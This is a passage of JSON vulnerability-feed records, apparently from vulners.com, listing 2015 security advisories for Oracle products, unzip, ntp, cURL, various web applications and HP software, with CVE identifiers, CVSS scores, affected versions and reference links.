"CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32650"], "description": "DoS, code execution.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-11-01T00:00:00", "title": "unzip security vulneravilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:03", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "unzip", "version": "6.0", "operator": "eq"}], "cvelist": ["CVE-2015-7696", "CVE-2015-7697"], "modified": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:14752", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14752", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32649"], "description": "Multiple memory corruptions.", "edition": 1, "reporter": "UBUNTU", "published": "2015-11-01T00:00:00", "title": "ntp multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:03", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "ntp", "version": "4.2", "operator": "eq"}], "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-5219", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-5194", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7691", "CVE-2015-5196", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-5195", "CVE-2015-7850", "CVE-2015-7853"], "modified": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:14751", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14751", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:54", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31964", "https://vulners.com/securityvulns/securityvulns:doc:31976", "https://vulners.com/securityvulns/securityvulns:doc:30267"], "description": "Request may be sent via wrong connection if NTLM authentication is used. Information disclosure, DoS.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-11-01T00:00:00", "title": "cURL security vulnerabilitiies", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:54", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "cURL", "version": "7.35", "operator": "eq"}, {"name": "libcurl", "version": "7.41", "operator": "eq"}], "cvelist": ["CVE-2015-3236", "CVE-2015-3153", "CVE-2015-3144", "CVE-2015-3237", "CVE-2014-0015", "CVE-2015-3145", "CVE-2015-3143", "CVE-2015-3148"], "modified": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:13544", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13544", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32633", "https://vulners.com/securityvulns/securityvulns:doc:32617", "https://vulners.com/securityvulns/securityvulns:doc:32634", "https://vulners.com/securityvulns/securityvulns:doc:32646", "https://vulners.com/securityvulns/securityvulns:doc:32605", "https://vulners.com/securityvulns/securityvulns:doc:32635", "https://vulners.com/securityvulns/securityvulns:doc:32613", "https://vulners.com/securityvulns/securityvulns:doc:32645", "https://vulners.com/securityvulns/securityvulns:doc:32599", "https://vulners.com/securityvulns/securityvulns:doc:32608", "https://vulners.com/securityvulns/securityvulns:doc:32604", "https://vulners.com/securityvulns/securityvulns:doc:32603", "https://vulners.com/securityvulns/securityvulns:doc:32624", "https://vulners.com/securityvulns/securityvulns:doc:32636", "https://vulners.com/securityvulns/securityvulns:doc:32619", "https://vulners.com/securityvulns/securityvulns:doc:32609", "https://vulners.com/securityvulns/securityvulns:doc:32611", "https://vulners.com/securityvulns/securityvulns:doc:32625", "https://vulners.com/securityvulns/securityvulns:doc:32626", "https://vulners.com/securityvulns/securityvulns:doc:32627", "https://vulners.com/securityvulns/securityvulns:doc:32620", "https://vulners.com/securityvulns/securityvulns:doc:32612", "https://vulners.com/securityvulns/securityvulns:doc:32640", "https://vulners.com/securityvulns/securityvulns:doc:32601", "https://vulners.com/securityvulns/securityvulns:doc:32614", "https://vulners.com/securityvulns/securityvulns:doc:32618", "https://vulners.com/securityvulns/securityvulns:doc:32638", "https://vulners.com/securityvulns/securityvulns:doc:32632", "https://vulners.com/securityvulns/securityvulns:doc:32622", "https://vulners.com/securityvulns/securityvulns:doc:32602", "https://vulners.com/securityvulns/securityvulns:doc:32648", "https://vulners.com/securityvulns/securityvulns:doc:32644", "https://vulners.com/securityvulns/securityvulns:doc:32616", "https://vulners.com/securityvulns/securityvulns:doc:32606", "https://vulners.com/securityvulns/securityvulns:doc:32623", "https://vulners.com/securityvulns/securityvulns:doc:32631", "https://vulners.com/securityvulns/securityvulns:doc:32637", "https://vulners.com/securityvulns/securityvulns:doc:32628", "https://vulners.com/securityvulns/securityvulns:doc:32630", "https://vulners.com/securityvulns/securityvulns:doc:32615", "https://vulners.com/securityvulns/securityvulns:doc:32639", "https://vulners.com/securityvulns/securityvulns:doc:32629", "https://vulners.com/securityvulns/securityvulns:doc:32621", "https://vulners.com/securityvulns/securityvulns:doc:32607", "https://vulners.com/securityvulns/securityvulns:doc:32600", "https://vulners.com/securityvulns/securityvulns:doc:32642", "https://vulners.com/securityvulns/securityvulns:doc:32647", "https://vulners.com/securityvulns/securityvulns:doc:32641", "https://vulners.com/securityvulns/securityvulns:doc:32643", "https://vulners.com/securityvulns/securityvulns:doc:32610"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "reporter": " ", "published": "2015-10-26T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:03", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Easy2Map", "version": "1.2", "operator": "eq"}, {"name": "SourceBans", "version": "1.4", "operator": "eq"}, {"name": "twig", "version": "1.20", "operator": "eq"}, {"name": "Bugzilla", "version": "5.0", "operator": "eq"}, {"name": "ZendFramework", "version": "1.12", "operator": "eq"}, {"name": "Pie Register", "version": "2.0", "operator": "eq"}, {"name": "Support Ticket System", "version": "1.2", "operator": "eq"}, {"name": "Payment Form for PayPal Pro", "version": "1.0", "operator": "eq"}, {"name": "Magento", "version": "1.9", "operator": "eq"}, {"name": "LinuxOptic CMS", "version": "2009", "operator": "eq"}, {"name": "TestLink", "version": "1.9", "operator": "eq"}, {"name": "drupal", "version": "7.39", "operator": "eq"}, {"name": "YouTube Embed", "version": "3.3", "operator": "eq"}, {"name": "NodeBB", "version": "0.8", "operator": "eq"}, {"name": "K2 Platforms", "version": "4.6", "operator": "eq"}, {"name": "Qlikview", "version": "11.20", "operator": "eq"}, {"name": "Font", "version": "7.5", "operator": "eq"}, {"name": "Lime Survey", "version": "2.06", "operator": "eq"}, {"name": "X2Engine", "version": "4.2", "operator": "eq"}, {"name": "JSPMySQL", "version": "1.0", "operator": "eq"}, {"name": "Cerb", "version": "7.0", "operator": "eq"}, {"name": "James Server", "version": "2.3", "operator": "eq"}, {"name": "ResAds", "version": "1.0", "operator": "eq"}, {"name": "Bamboo", "version": "5.9", "operator": "eq"}, {"name": "BMC Remedy AR", "version": "9.0", "operator": "eq"}, {"name": "iTop", "version": "2.1", "operator": "eq"}, {"name": "Revive Adserver", "version": "3.2", "operator": "eq"}, {"name": "ServiceDesk Plus", "version": "9", "operator": "eq"}, {"name": "DataTables", "version": "1.10", "operator": "eq"}, {"name": "Jenkins", "version": "1.626", "operator": "eq"}, {"name": "JIRA", "version": "6.4", "operator": "eq"}, {"name": "Secure MFT", "version": "2015", "operator": "eq"}, {"name": "Openfire", "version": "3.10", "operator": "eq"}, {"name": "DWBooster Appointment Booking Calendar", "version": "1.1", "operator": "eq"}], "cvelist": ["CVE-2015-7377", "CVE-2015-6000", "CVE-2015-5075", "CVE-2015-7390", "CVE-2015-6544", "CVE-2015-7668", "CVE-2015-5715", "CVE-2015-7373", "CVE-2015-6659", "CVE-2015-5956", "CVE-2015-3623", "CVE-2015-6660", "CVE-2015-7682", "CVE-2015-5723", "CVE-2015-7368", "CVE-2015-7319", "CVE-2015-7299", "CVE-2015-7669", "CVE-2015-5071", "CVE-2015-7371", "CVE-2015-7320", "CVE-2015-6497", "CVE-2015-4499", "CVE-2015-7683", "CVE-2015-7367", "CVE-2014-8778", "CVE-2015-7670", "CVE-2015-7391", "CVE-2015-7372", "CVE-2015-7366", "CVE-2015-7364", "CVE-2015-7667", "CVE-2015-5072", "CVE-2015-6545", "CVE-2015-7370", "CVE-2015-7666", "CVE-2015-6658", "CVE-2015-6576", "CVE-2015-5076", "CVE-2015-6584", "CVE-2015-5074", "CVE-2015-5603", "CVE-2015-7365", "CVE-2015-6661", "CVE-2015-7369", "CVE-2015-5714", "CVE-2015-6665"], "modified": "2015-10-26T00:00:00", "id": "SECURITYVULNS:VULN:14750", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14750", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:02", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32510", "https://vulners.com/securityvulns/securityvulns:doc:32597"], "description": "Authentication bypass, information disclosure.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-10-26T00:00:00", "title": "HP ArcSight Logger security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:02", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "ArcSight Logger", "version": "6.0", "operator": "eq"}], "cvelist": ["CVE-2015-2136", "CVE-2015-6029"], "modified": "2015-10-26T00:00:00", "id": "SECURITYVULNS:VULN:14693", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14693", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32598"], "description": "No description provided", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-10-26T00:00:00", "title": "HP Asset Manager information disclosure", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:02", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Asset Manager", "version": "9.50", "operator": "eq"}], "cvelist": ["CVE-2015-5448"], "modified": "2015-10-26T00:00:00", "id": "SECURITYVULNS:VULN:14749", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14749", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}
